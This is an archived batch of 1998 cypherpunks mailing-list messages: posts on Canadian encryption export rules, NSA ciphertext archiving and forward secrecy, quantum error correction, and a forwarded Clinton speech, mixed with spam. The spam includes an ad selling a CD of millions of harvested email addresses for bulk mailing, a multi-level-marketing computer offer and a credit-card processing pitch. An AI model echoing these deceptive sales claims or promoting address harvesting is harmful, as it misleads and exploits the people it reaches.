http://www.cellphonebatterystore.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Merchant Services <chargeus@usa.net>
Date: Sun, 6 Sep 1998 00:30:21 -0700 (PDT)
To: Merchant Accounts <webmaster@zurich.ibm.com>
Subject: CREDIT CARD PROCESSING
Message-ID: <199809051930.PAA14411@localhost.localdomain>
MIME-Version: 1.0
Content-Type: text/plain


Dear Friend,

How would you like to be able to accept credit cards
directly from your website, telephone or fax for your
products and services and never need to purchase or lease
expensive credit card equipment or pay a monthly 
fee for online ordering capabilities?

**Brand New** Telecharge Credit Card acceptance program 
allows you to accept VISA or Mastercard any TIME,any WHERE 
through phone, fax or internet without the need to purchase 
or lease expensive credit card equipment. This brand new 
program will allow you to accept credit cards tomorrow.
You simply pick up your telephone, dial a special toll free 800# 
24 hrs a day 7 days a week, input a passcode and the credit card # 
and receive an immediate authorization over the phone. Within 2 days 
the money will be in your bank account. This is an exciting program 
for all businesses. Before you spend any money on a credit card program
LOOK at this new program! 
To have a representative call you to explain the details of this program
please email your Name, Phone Number (Don't forget your area code)
and best time to call to:

mailto:chargeus@usa.net  

A representative will  return your call within 24hrs. 
A 100 % approval rate. This is a special promotion 
and for a limited time. Start today and save an additional 36%. 
Also receive 6 months of online advertising absolutely FREE!
for your business.

Feel free to call us and leave a message. A representative will return
your call within 24hrs.
World Tech Inc.
818-718-9429
7210 Jordan Ave.
Canoga Park. CA.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jkthomson <jkthomson@bigfoot.com>
Date: Sat, 5 Sep 1998 16:00:22 -0700 (PDT)
To: cypherpunks@toad.com
Subject: request for [cdn] export laws.
Message-ID: <3.0.3.32.19980905160024.0070f7c0@dowco.com>
MIME-Version: 1.0
Content-Type: text/plain



greetings, listmembers.

I have been looking for the export restrictions (if any) that regulate
canadian encryption products.  I have tried searching the net for a little
while, and although I have found a few (contradictory) blurbs on it, I have
found no 'official' documents or links to them.  does this information
exist on the web, and if not, who would be the best department to ask so
that I get the least red-tape or 'runaround'?



-----------------------------------------------------------------------
 james 'keith' thomson <jkthomson@bigfoot.com>  www.bigfoot.com/~ceildh
 jkthomson:C181 991A 405C EAFB 2C46 79B5 B1DC DB78 8196 122D [06.07.98]
 ceildh   :1D79 59AF ED75 5945 6003 8240 DA34 ACCA 9DE4 6BC9 [05.14.98]
 ICQ:746241 <keys> at pgp.mit.edu     ...and former sysop of tnbnog BBS
-----------------------------------------------------------------------
"Microsoft's biggest and most dangerous contribution to the software
 industry may be the degree to which it has lowered user expectations."
				     - Esther Schlindler, OS/2 Magazine
=======================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "kryz" <chrisharwig@hetnet.nl>
Date: Sun, 6 Sep 1998 05:10:26 -0700 (PDT)
To: "Cypherpunks" <cypherpunks@toad.com>
Subject: "In dreams begin responsibility" - W.B. Yeats
In-Reply-To: <19980904224426.3.MAIL-SERVER@pub1.pub.whitehouse.gov>
Message-ID: <MAPI.Id.0016.0072797a202020203030303430303034@MAPI.to.RFC822>
MIME-Version: 1.0
Content-Type: text/plain




----------
| Date: vrijdag 4 september 1998 22:44:00
| From: The White House
| To: Public-Distribution@pub.pub.whitehouse.gov
| Subject: 1998-09-04 Remarks by President to Officials of Gateway Computers
|
|
|                             THE WHITE HOUSE
|
|                      Office of the Press Secretary
|                            (Dublin, Ireland)
| ________________________________________________________________________
| For Immediate Release                                  September 4, 1998
|
|
|
|                         REMARKS BY THE PRESIDENT
|                           TO BUSINESS LEADERS,
|             AND OFFICIALS AND EMPLOYEES OF GATEWAY COMPUTERS
|
|
|                    Gateway Computers European Facility
|                      Santry, County Dublin, Ireland
|
|
| 4:12 P.M. EDT
|
|
|   THE PRESIDENT:  Thank you for the wonderful welcome, the waving flag
| -- (applause) -- the terrific shirts -- I want one of those shirts
| before I leave -- (applause) -- at least shirts have not become virtual,
| you can actually have one of them.  (Laughter.)
|
|   I want to say to the Taoiseach how very grateful I am for his
| leadership and friendship.  But I must say that I was somewhat
| ambivalent when we were up here giving our virtual signatures.  Do you
| have any idea how much time I spend every day signing my name?  I'm
| going to feel utterly useless if I can't do that anymore.  (Laughter.)
| By the time you become the leader of a country, someone else makes all
| the decisions -- you just sign your name.  (Laughter.)  You may find you
| can get away with virtual presidents, virtual prime ministers, virtual
| everything.  Just stick a little card in and get the predicable
| response.
|
|   I want to congratulate Baltimore Technologies on making this possible
| as well.  And Ted Waitt, let me thank you for the tour of this wonderful
| facility.  As an American I have to do one little chauvinist thing.  I
| asked Ted -- I saw the Gateway -- do you see the Gateway boxes over
| there and the then the Gateway logo and I got a Gateway golf bag before
| I came in and it was black and white like this.  (Applause.)  So I said,
| where did this logo come from?  And he said, "It's spots on a cow."  He
| said, we started in South Dakota and Iowa and people said how can there
| be a computer company in the farmland of America?  And now there is one
| in the farmland of America that happens to be in Ireland.
|
|   But it's a wonderful story that shows the point I want to make later,
| which is that there is no monopoly on brain power anywhere.  There have
| always been intelligent people everywhere, in the most underinvested and
| poorest parts of the world.  Today on the streets of the poorest
| neighborhoods in the most crowded country in the world -- which is
| probably India, in the cities -- there are brilliant people who need a
| chance.
|
|       And technology, if we handle it right, will be one of the great
| liberating and equalizing forces in all of human history, because it
| proves that unlike previous economic waves you could be on a small farm
| in Iowa or South Dakota or you could be in a country like Ireland, long
| under-invested in by outsiders, and all of a sudden open the whole world
| up.  And you can prove that people you can find on any street corner can
| master the skills of tomorrow.  So this is a very happy day.
|
|       I want to thank the other officials from the Irish government,
| Minister Harney and Minister O'Rourke and others.  I thank my great
| Commerce Secretary, Bill Daley, for being here, and Jim Lyons, who heads
| my economic initiatives for Ireland, and Ambassador Jean Kennedy Smith,
| who has done a magnificent job for us and will soon be going home after
| having played a major role in getting the peace process started, and we
| thank her.
|
|       I thank you all personally for the warm reception you gave George
| Mitchell, because you have no idea how much grief he gave me for giving
| him this job.  (Laughter and applause.)  You all voted for the agreement
| now, and everything is basically going in the right direction, but it
| was like pulling fingernails for three years -- everybody arguing over
| every word, every phrase, every semicolon, you know?  In the middle of
| that, George Mitchell was not all that happy that I had asked him to
| undertake this duty.
|
|       But when you stood up and you clapped for him today, for the first
| time since I named him, he looked at me and said thank you.  So thank
| you again, you made my day.  (Applause.)  Thank you.
|
|       I'd also like to thank your former Prime Minister and Taoiseach,
| John Bruton, who's here and who also worked with us on the peace
| process.  Thank you, John, for coming, it's delightful to see you.
| (Applause.)  And I would like you to know that there are a dozen members
| of the United States Congress here, from both parties -- showing that we
| have reached across our own divide to support peace and prosperity in
| Ireland.  And I thank all the members of Congress and I'd like to ask
| them to stand up, just so you'll see how many there are here.  Thank you
| very much.  (Applause.)
|
|       I know that none of the Irish here will be surprised when I tell
| you that a recent poll of American intellectuals decided that the best
| English language novel of the 20th century was a book set in Dublin,
| written by an Irishman, in Trieste and Zurich, and first published in
| New York and Paris -- a metaphor of the world in which we now live.
| James Joyce's "Ulysses" was the product of many cultures, but it remains
| a deeply Irish work.
|
|       Some of you will remember that near the beginning of the book,
| Joyce wrote, "History is a nightmare from which I am trying to awake."
| Much of Irish history, of course, is rich and warm and wonderful, but we
| all know it has its nightmarish aspects.  They are the ones from which
| Ireland is now awakening, thanks to those who work for peace and thanks
| to those who bring prosperity.
|
|       Much of Ireland's new history, of course, will be shaped by the
| Good Friday Peace Agreement.  You all, from your response to Senator
| Mitchell, are knowledgeable of it and proud of it, and I thank you for
| voting for it in such overwhelming numbers in the Republic.
|
|       I think it's important that you know it's a step forward not only
| for Irish people but for all people divided everywhere who are seeking
| new ways to think about old problems, who want to believe that they
| don't forever have to be at the throats of those with whom they share a
| certain land, just because they are of a different faith or race or
| ethnic group or tribe.  The leaders and the people of Ireland and
| Northern Ireland, therefore, are helping the world to awaken from
| history's nightmares.
|
|       Today Ireland is quite an expansive place, with a positive outlook
| on the world.  The 1990s have changed this country in profound and
| positive ways.  Not too long ago, Ireland was a poor country by European
| standards, inward-looking, sometimes insular.
|
|       Today, as much as any country in Europe, Ireland is connected in
| countless ways to the rest of the world, as Ted showed me when we moved
| from desk to desk to desk downstairs with the people who were talking to
| France and the people who were talking to Germany and the people who
| were talking to Scandinavia, and on and on and on.
|
|       This country has strong trade relations with Britain and the
| United States, with countries of the European Union and beyond.  And
| Ireland, as we see here at this place, is fast becoming a technological
| capital of Europe.  Innovative information companies are literally
| transforming the way the Irish interact and communicate with other
| countries.  That is clear here -- perhaps clearer here than anywhere
| else -- at Gateway, a company speaking many languages and most of all
| the language of the future.  Gateway and other companies like Intel and
| Dell and Digital are strengthening Ireland's historic links to the
| United States and reaching out beyond.
|
|       I think it is very interesting, and I was not aware of this before
| I prepared for this trip, that Dublin is literally becoming a major
| telecommunications center for all of Europe.  More and more Europeans do
| business on more and more telephones, and more and more of their calls
| are routed through here.  You connect people and businesses in very
| combination:  a German housewife, a French computer company, a Czech
| businessman, a Swedish investor -- people all around Europe learning to
| do business on the Internet.
|
|       At the hub of this virtual commerce is Ireland, a natural gateway
| for the future also of such commerce between Europe and the United
| States.  In the 21st century, after years and years and years of being
| disadvantaged because of what was most important to the production of
| wealth, Ireland will have its day in the sun because the most important
| thing in the 21st century is the capacity of people to imagine, to
| innovate, to create, to exchange ideas and information.  By those
| standards, this is a very wealthy nation indeed.
|
|       Your growth has been phenomenal:  last year, 7.7 percent; prices
| rising at only 1.5 percent; unemployment at a 20-year low.  Ireland is
| second only to the United States in exporting software.  This year the
| Irish government may post a surplus of $1.7 billion.  The Celtic tiger
| is roaring and you should be very proud of it.  (Applause.)
|
|       It has been speculated, half seriously, that there are more
| foreigners here than at any time since the Vikings pillaged Ireland in
| the 9th century.  (Laughter.)  I guess I ought to warn you -- you know,
| whenever a delegation of Congressmen comes to Ireland they all claim to
| be Irish -- and in a certain way they all are -- but one of the members
| of the delegation here, Congressman Hoyer, who has been a great friend
| of the peace process, is in fact of Viking heritage, descent.
| (Laughter.)  Stand up, Steny.  (Applause.)
|
|       Now, all the rest of us come here and pander to you and tell you
| we love Ireland because there is so much Irish blood running in our
| veins.  He comes here and says he loves Ireland because there is so much
| of his blood running in your veins.  (Laughter and applause.)
|

|       Let me get back to what I was saying about the Internet -- because
| your position vis-a-vis telecommunication can be seen through that.
| When I came here just three years ago -- had one of the great days of my
| life, there was so much hope about the peace process then -- only 3
| million people worldwide were connected to the Internet, three years
| ago.  Today there are over 120 million people, a 40-fold increase in
| three years.  In the next decade sometime it will be over a billion.
| Already, if you travel, you can see the impact of this in Russia or in
| China or other far-flung places around the globe.
|
|       I had an incredible experience in one of these Internet cafes in
| Shanghai, where I met with young high school students in China working
| the Internet.  Even if they didn't have computers at home, they could
| come to the cafe, buy a cup of coffee, rent a little time and access the
| Internet.  This is going to change dramatically the way we work and
| live.  It is going to democratize opportunity in the world in a way that
| has never been the case in all of human history.  And if we are wise and
| decent about it, we can not only generate more wealth, we can reduce
| future wars and conflicts.
|
|       The agreement that we signed today does some important things.  It
| commits us to reduce unnecessary regulatory barriers, to refrain from
| imposing customs duties, to keep taxes to a minimum, to create a stable
| and predictable environment for doing business electronically.  It helps
| us, in other words, to create an architecture for one of the most
| important areas of business activity in the century ahead.
|
|       There are already 470 companies in Ireland that are American, and
| many of them are in the information sector.  The number is growing
| quickly.  So I say to you that I think this agreement we have signed
| today, and the way we have signed it, will not only be helpful in and of
| themselves, but will stand for what I hope will be the future direction
| of your economy and America's, the future direction of our relationship,
| and will open a massive amount of opportunity to ordinary people who
| never would have had it before.
|
|       A strong modern economy thrives on education, innovation, respect
| for the interests of workers and customers and a respect for the earth's
| environment.  An enlightened population is our best investment in a good
| future.  Prosperity reinforces peace as well.  The Irish have long
| championed prosperity, peace, and human decency, and for all that I am
| very grateful.
|
|       I would like to just say, because I can't leave Ireland without
| acknowledging this, that there are few nations that have contributed
| more than Ireland, even in times which were difficult for this country,
| to the cause of peace and human rights around the world.  You have given
| us now Mary Robinson to serve internationally in that cause.  But since
| peacekeeping began for the United Nations 40 years ago, 75 Irish
| soldiers have given their lives.
|
|       Today we work shoulder to shoulder in Bosnia and the Middle East.
| But I think you should know, that as nearly as I can determine, in the
| 40 years in which the world has been working together on peacekeeping,
| the only country in the world which has never taken a single, solitary
| day off from the cause of world peace to the United Nations peacekeeping
| operations is Ireland.  And I thank you.  (Applause.)
|
|       In 1914, on the verge of the First World War, which would change
| Europe and Ireland forever, William Butler Yeats wrote his famous line,
| "In dreams begin responsibility."  Ireland has moved from nightmares to
| dreams.  Ireland has assumed great responsibility.  As a result, you are
| moving toward permanent peace, remarkable prosperity, unparalleled
| influence, and a brighter tomorrow for your children.  May the
| nightmares stay gone, the dreams stay bright, and the responsibility
| wear easily on your shoulder, because the future is yours.
|
|       Thank you, and God bless you.
|
|             END                        4:28 P.M. (L)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill301@success600.com
Date: Sat, 5 Sep 1998 21:11:51 -0700 (PDT)
To: <bill301@success600.com>
Subject: Free Laptop or Desktop Computer
Message-ID: <00f442406010698VERY@mail.monemakr.com>
MIME-Version: 1.0
Content-Type: text/plain


Sent from: Success by Design
4974 N Cedar #116, Fresno, Ca, 93705
209 444-0550, bill301@success600.com
This text is placed here as stipulated in bill S. 1618 Title 3.
http://www.senate.gov/~murkowski/commercialemail/EMailAmendText.html
This is a FREE offer if you wish to be removed from future mailings, please e-mail to... (remove@success600.com) and this software will automatically block you from their future mailings.

FREE  Desktop or Laptop  Computer and $1500*
$0 Down! ZERO $ Out of Pocket!

YES!  THIS IS REAL AND IT'S HAPPENING  NOW!!!

100% Financing!  99.9% Approval.... We accept A, B, C, and D Credit! 
Even if you've filed bankruptcy, you will be approved!

No money required to sign up!

Choose from a Desktop or Laptop. 
Only $108 per month! *(Paid In Full After 5 Sales)
In-House Financing! Over $1.7 Billion available!

Also Make money on all your sales 
$200 first sale
$250 second sale
$300 third sale
$350 fourth sale
$400 for every personal sale after that!

Plus after 5 personal sales you have an option of taking a 
$1000 Cash Bonus, or $150 for 50 months! *This pays for your computer!

At 10 personal sales receive a $4000 Cash Bonus or if you chose the $150 a month above, you will receive a $500 Cash Bonus!

Plus... $500 bonus for every 5 sales after that!

Plus... Override commissions from $25 to $100 for all downline sales through 7 generations!

Desktop w/Monitor & Printer (or) Laptop
only $108 month...or *Paid For after 5 sales!

Don't Procrastinate on This One! Get the following Information Now!

For more info E-mail to    ( free@success600.com) 

Please leave
Name 
Phone 
Fax 
E-mail

Thank You




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Emery <die@pig.die.com>
Date: Sat, 5 Sep 1998 18:49:05 -0700 (PDT)
To: David Honig <honig@sprynet.com>
Subject: Re: Zooko on JYA, cpunks, and surveillance (was: Re: Can't tell the kooks without a scorecard? Re: Monkey Wrenching the Echelon Engine)
In-Reply-To: <199809042025.WAA19299@xs1.xs4all.nl>
Message-ID: <19980905214853.A27226@die.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, Sep 05, 1998 at 07:38:09AM -0700, David Honig wrote:
> At 10:25 PM 9/4/98 +0200, Zane Lewkowicz wrote:
> 
> >I used to think that the feds would never bother to investigate
> >the likes of us, but i've been proven wrong.  So now i assume 
> >that all unencrypted mail is scanned (especially in light of 
> >ECHELON & UKUSA & such).
> 
> And all encrypted mail is archived.
> 
	And that is the rub.  The real danger of key escrow type schemes
lies in the future decryption under a different political and legal
climate of half forgotten traffic going back years and years - stuff
fetched from vast secret archives of potentially  interesting encrypted
messages squirelled away in the off chance that some time in the future
"they" will be in possession of the key to some of it and interested in
the contents. 

	And until crypto is universally used for almost everything,
saving the entirety of the 1-5% or so of email traffic that is encrypted
on the presumption that it wouldn't have been encrypted if it wasn't
important might be a good strategy, even if only a tiny fraction of
those messages can ever be broken.  And certainly saving all of the
cipher email traffic from people identified by traffic analysis (group
membership, corrospondance with suspicious or known bad-actor people or
places, match to profiles profane and devine, etc) is really a
no-brainer.

	The critical thing needed to protect against this chilling
threat is email tools that provide perfect forward secrecy.  PGP and the
like do not, and capturing thus PGP messages in the hope that later on
one has access to the private key is a very useful practice.  DH key
exchange has been around a long time, but so far the tentacles of the
NSA have kept it from being a standard automatic part of sendmail, MS
Exchange  and qmail...  Certainly one might want to enclose PGP or SMIME
email messages inside the encrypted tunnel to protect privacy in storage
and the "store" of store and forward mail routing, but having a secure
transport tunnel in the first place forces the vacuum cleaner hose to be
attached in quite different places where it is likely to be much more
visible and noticed.  And sure IPSEC would be nice, but simply making
the ESMTP traffic between a short list of mail router programs opaque
would certainly leverage a small effort with a large result whilst 
upgrading TCP/IP stacks and routers is a large effort...

	I've long heard that the NSA fills warehouses with high density
tapes of cyphertext they can't break or don't want to spend the
resources to break on the off chance that later on the key will be
available or the information deemed truly important enough for
cryptanalysis where possible.  And sometimes (as in the Venona decrypts)
this pays off...

	

-- 
	Dave Emery N1PRE,  die@die.com  DIE Consulting, Weston, Mass. 
PGP fingerprint = 2047/4D7B08D1 DE 6E E1 CC 1F 1D 96 E2  5D 27 BD B0 24 88 C3 18





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "D.STARR" <d-starr@usa.net>
Date: Sun, 6 Sep 1998 04:04:01 -0700 (PDT)
To: jkthomson@bigfoot.com
Subject: Re: [request for [cdn] export laws.]
Message-ID: <19980906110357.28581.qmail@www0i.netaddress.usa.net>
MIME-Version: 1.0
Content-Type: text/html



The following is a good site for tracking down info on Canadian government policy on any topic:  
                  http://info.ic.gc.ca/.  

Picked up the following using their search engine.
Check it out.

I suspect that there are no export restrictions at this time unless they were included in NAFTA. So you may want to try a NAFTA search as well.

You could also try phoning Reference Canada at 1-800-667-3355.

Excerpt from the following speaking notes:

***************************************************************************************************************

Security.

Before they use electronic commerce, consumers and business want to make sure that their transactions will
be secure. They also want to know to know that those they do business with are who they say they are.

As you know, we have just completed a consultation on setting a cryptography policy for Canada. We
received over 150 submissions in response to our discussion paper, which addressed issues such as access
to encrypted stored data, access to real time communications, and export controls. My officials are
reviewing the submissions as input into the policy we intend to develop for the fall. 

With regard to authentication and certification, the government is working with suppliers and a number of
key business sectors to develop criteria for government use of certification and authentication services. We
also expect to roll out the Government of Canada's public key infrastructure in the next 10 to 12 months.

***************************************************************************************************************




                               SPEAKING NOTES
                   FOR THE HONOURABLE JOHN MANLEY
                           MINISTER OF INDUSTRY

                     ELECTRONIC COMMERCE SUMMIT
                             MINISTERIAL PANEL

                                    OTTAWA
                                 APRIL 30, 1998

Date: 04/30/98 

Thank you, David.

Electronic commerce is at the leading edge of the trends that are transforming the world economy.

The trends are related and mutually reinforcing: improvements in information and communications
technologies, globalization and a shift to an economy based on knowledge.

Information technology is transforming the business process. The Internet, for example, allows businesses to
interact 24-hours-a-day, seven days a week, not only with suppliers, but with consumers world-wide. At
the same time, those consumers have access to an unlimited global array of products and services.

The knowledge economy places a premium on continuous improvement and the creation and application of
new ideas. To stay ahead, Canada needs to build on its strengths in research and people and focus these
resources on building a stronger Canadian innovation system.

A key part of our government's response to this challenge is our agenda for Connecting Canadians. The
goal is to make Canada the most connected country in the world by the year 2000. This is a six-part
strategy to make Canada the world leader in developing and using an advanced information infrastructure. It
involves: promoting access; growing digital content industries; putting government on line; encouraging smart
communities; promoting a connected Canada to the world; and developing electronic commerce.

Much of the groundwork is in place: we are already among the most connected nations on earth. Canada
leads the G7 in penetration of cable, telephones and home computers, and we are second only to the US in
terms of Internet host penetration. Our Internet access charges are the lowest in the world. An estimated
four million Canadian business users may be on the Internet by the year 2000.

Connecting Canadians is a partnership agenda. It is the private sector that has built the leading edge info
highway we have in Canada, and it is the private sector that will build the next generation. But, government
has key roles to play in encouraging competition, removing impediments to growth, reducing uncertainty,
encouraging innovation and speed, and responding to accessibility gaps.

Initiatives such as SchoolNet, Community Access Program and Computers for Schools are good examples
of how we have worked with business, educators, community leaders and governments to respond to the
challenge of access.

The Canadian Network for the Advancement of Research, Industry and Education, or CANARIE, is
another outstanding example of private and public sector partnership. Our February Budget commits $55
million to CANARIE's work in building the next generation Canadian Internet.

We know that we have to bring the power of these partnerships to bear on the challenge of making Canada
a world leader in the development and use of electronic commerce. 

We view the move to electronic commerce as inevitable. If we move fast, if we remove the uncertainties
holding back electronic commerce on open networks, we can create a global centre of excellence for
electronic commerce. In short, with the right framework, electronic commerce has phenomenal growth
prospects.

While the challenges are diverse and complex, they can be viewed as revolving around one simple issue:
TRUST.

The best way to build trust is to deal directly with issues of security, privacy, consumer-protection and legal
frameworks. I'd like to touch briefly on each of these.

***************************************************************************************************************

Security.

Before they use electronic commerce, consumers and business want to make sure that their transactions will
be secure. They also want to know to know that those they do business with are who they say they are.

As you know, we have just completed a consultation on setting a cryptography policy for Canada. We
received over 150 submissions in response to our discussion paper, which addressed issues such as access
to encrypted stored data, access to real time communications, and export controls. My officials are
reviewing the submissions as input into the policy we intend to develop for the fall. 

With regard to authentication and certification, the government is working with suppliers and a number of
key business sectors to develop criteria for government use of certification and authentication services. We
also expect to roll out the Government of Canada's public key infrastructure in the next 10 to 12 months.

***************************************************************************************************************

Another aspect of building trust is privacy.

If a consumer thinks personal information just floats around cyber-space, waiting for anyone to take a look
or use for purposes that haven't been agreed to, that consumer will think twice about using an on-line
service.

To build consumer confidence in electronic transactions, Anne McLellan and I are working towards putting
into law the Canadian standard for the protection of personal information. The standard was developed by
the private sector and consumer groups, with the support of government. It has proven its effectiveness in
changing business practices and providing guidance. But it's missing a few elements, notably on the
enforcement front.

Our government is committed to enacting legislation to protect personal information in the private sector by
the year 2000 and, to that effect, Anne and I plan to introduce a bill in the House in the fall.

Consumer Protection is also a concern.

Potential customers want to know where a business is located or know what will happen if merchandise
they order is shoddy, or simply doesn't show up. Are there effective redress mechanisms?

If we want Canadians to move into electronic commerce in meaningful numbers, they have to feel that there
will be some measure of consumer protection. We need to know if our current rules and regulations are
sufficient to deal with consumer protection issues or if they need to be adjusted. In response to these
questions, we have launched some studies and held consultations, including a business-consumer roundtable
last week.

As a result of these discussions, a policy paper on consumer protection will be developed and we plan to
release guidelines on consumer protection in the fall.

For electronic commerce to flourish, the private sector must continue to lead. We generally believe that with
minor adjustments, existing market place rules and practices will be able to create the framework for the
development and growth of electronic commerce. We believe in the ability of private industry, with the
direct input of consumers, to deal with the key issues of trust and confidence. Technological solutions,
competition and voluntary codes can go a long way to address such issues.

But, Canada is not alone in assessing these issues: governments and the private sector worldwide are
examining both domestic and international policies and practices which affect electronic commerce.

Which is what October's OECD Ministerial conference is all about.

The conference will bring together the private sector with key international organizations interested in
electronic commerce, as well as 29 OECD governments, and a number observer governments.

The goal of the conference is nothing short of establishing an international road map for electronic
commerce.

In setting the agenda for that conference and in setting out the international road map, we are looking to
Canadian companies for many of the approaches and solutions needed to build an effective global
marketplace.


cypherpunks-errors@toad.com wrote:

greetings, listmembers.

I have been looking for the export restrictions (if any) that regulate
canadian encryption products.  I have tried searching the net for a little
while, and although I have found a few (contradictory) blurbs on it, I have
found no 'official' documents or links to them.  does this information
exist on the web, and if not, who would be the best department to ask so
that I get the least red-tape or 'runaround'?



-----------------------------------------------------------------------
 james 'keith' thomson   www.bigfoot.com/~ceildh
 jkthomson:C181 991A 405C EAFB 2C46 79B5 B1DC DB78 8196 122D [06.07.98]
 ceildh   :1D79 59AF ED75 5945 6003 8240 DA34 ACCA 9DE4 6BC9 [05.14.98]
 ICQ:746241  at pgp.mit.edu     ...and former sysop of tnbnog BBS
-----------------------------------------------------------------------
"Microsoft's biggest and most dangerous contribution to the software
 industry may be the degree to which it has lowered user expectations."
				     - Esther Schlindler, OS/2 Magazine
=======================================================================




Get free e-mail and a permanent address at http://www.netaddress.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Sun, 6 Sep 1998 02:25:58 -0700 (PDT)
To: (STUFFED SUNDAY SEPTEMBER 6 1998)
Subject: Vibrator mistaken for bomb/Keeping sex fresh: Explicit techniques revealed
Message-ID: <19980906071000.20692.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


This issue brings  yet another great collection of
30+ super hi-res jpeg photographs;  as well as our
usual  crazy  mix of unbelievable (but true)  sexy
news;  informative,  educational and  entertaining
features; and a whole load more...

 + PAGE 2 'SPREAD'
  + WILD THUMBNAILS
   + WHAT A DILDO!
    + WANKY RACES
     + THUMBNAIL HEAVEN
      + SEXY STORY: "A VIRTUAL FANTASY"
       + THE BEST OF EUREKA!
        + PUSSY SURPRISE PICS
         + KEEPING SEX FRESH
          + SUPER HI-RES POSTER PIC

- Enjoy!

       ---->   http://stuffed.net/98/9/6/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/9/6/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Oskar Pearson <oskar@is.co.za>
Date: Sat, 5 Sep 1998 22:21:08 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Quantum Computing progress - physnews update.388
Message-ID: <19980906072053.59022@is.co.za>
MIME-Version: 1.0
Content-Type: text/plain


Hi

I hope that this is relevant, apologies if it isn't. I am neither a physicist,
nor a crypto-oriented-mathematician... I am a part-time software developer and
Unix support person :)

As for the standard paranoia: trichloroethylene isn't in Ispell's dictionary.
The NSA have obviously infiltrated the Linux/Freeware developer community.
More proof that we are simply trailing behind the NSA in crypto technology.

First link from altavista search for +"quantum computing" +cryptography
Probably irrelevant :)
	http://hwilwww.rdec.redstone.army.mil/MICOM/wsd/ST/RES/QC/qc.html

>From a mailing list I am on:
0--------------------------------------------------------------------------0
Date: Thu, 3 Sep 1998 14:03:05 -0400 (EDT)
From: physnews@aip.org (AIP listserver)
Message-Id: <199809031803.OAA01296@aip.org>
To: physnews-mailing@aip.org
Subject: update.388

PHYSICS NEWS UPDATE                         
The American Institute of Physics Bulletin of Physics News
Number 388 September 3, 1998  by Phillip F. Schewe and Ben
Stein

QUANTUM ERROR CORRECTION has been experimentally
demonstrated for the first time, greatly advancing the promise of
carrying out interesting calculations with quantum computers
(Updates 310 and 367).  Skeptics have maintained that quantum
computers would crash before carrying out a useful calculation since
the devices rely on fragile, easily corrupted quantum states. 
Proposed in 1995 and developed unceasingly since then, quantum
error correction has been all theory up until now.  Aiming radio-
frequency pulses at a liquid solution of alanine or trichloroethylene
molecules, researchers at Los Alamos and MIT (Raymond
Laflamme, 505-665-3394) spread a single bit of quantum
information onto three nuclear spins in each molecule.  Spreading
out the information made it harder to corrupt.  The bit of
information was a combination or "superposition" of the values 0
and 1, so that it represented a little amount of 0 and a little amount
of 1 at the same time.  Measuring the spins directly would destroy
this superposition and force the bit to become a 0 or a 1.  So, the
researchers instead "entangled" or interlinked the properties of the
three spins.  This allowed them to compare the spins to see if any
new differences arose between them without learning the bit of
information itself.  With this technique, they were able to detect and
fix errors in a bit's "phase coherence," the phase relationship
between the quantum waves corresponding to the 0 and 1
states.(D.G. Cory et al., Physical Review Letters, 7 Sept 1998.)

<remainder cut - about baseball bats :)>

-------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dcab@cwi.se
Date: Sun, 6 Sep 1998 01:51:47 -0700 (PDT)
To: dcab@cwi.se
Subject: JUST RELEASED!  10 Million!!!
Message-ID: <011328705550122442@ls_flancygerm.com>
MIME-Version: 1.0
Content-Type: text/plain



IT WAS JUST RELEASED!!
 
INTRODUCING...MILLIONS VOL. 1A

We took a total of over 92 million email addresses from many of the
touted CD's that are out there (bought them all - some were $300+)!
We added the millions we had in storage to those.   When we
combined them all, we had in excess of 100+ million addresses
in one huge file.

We then ran a super "sort/de-dupe" program against this huge list.
It cut the file down to less than 25 million!!! Can you believe that? It
seems that most people that are selling CD's are duping the public
by putting numerous files of addresses in the CD over and over. This
created many duplicate addresses. They also had many program
 "generated" email addresses like Compuserve, MCI, ANON's, etc.
This causes a tremendous amount of undeliverables, and for  those
that use Stealth programs, clogs up servers quickly with trash, etc.

We then ran a program that contained 1800+ keywords to remove
addresses with vulgarity,  profanity, sex-related names, postmaster,
 webmaster, flamer, abuse, spam, etc., etc.   Also eliminated all .edu,
.mil, .org, .gov, etc.   After that list was run against the remaining list,
it  reduced it down to near 10 million addresses!

So, you see, our list will save people hundreds of dollars buying all
others that are out there on  CD and otherwise. Using ours will be like
 using the 100+ million that we started with, but a lot less money and
alot less time!!

We also purchased Cyber-Promos ($995.00) CD.  We received it just
prior to finishing production work on the new CD.  We had our people
take a random sample of 300,000 addresses  from the touted 2.9 that
they advertised.   We used a program that allows us to take a random
sample of addresses from any list.  We were able to have the program
take every 9th address, thus giving us a 300,000 list of Cyber's email
addresses from top to bottom.  We cleaned these, and came up with about
100,000 addresses. These are also mixed in.

We also included a 6+ million "Remove/Flamer" file broke into seperate
files for ease of  extracting and adding to your own database of removes.

 "You can buy from the REST or you can buy from the BEST.   Your choice.
_____________________________

What others are saying:
 
"I received the CD on Friday evening.   Like a kid with a new toy, I
immediately started bulking out using the new email addresses.  Over
the course of the weekend, I emailed out over 500,000 emails and I
received less than TWENTY undeliverables!!  I am totally satisfied
with my purchase!!  Thanks Premier!!"

Dave Buckley
Houston,  TX

"This list is worth it's weight in gold!!  I sent out 100,000 emails for my
product and received over 55 orders!

Ann Colby
New Orleans, LA

****************************************
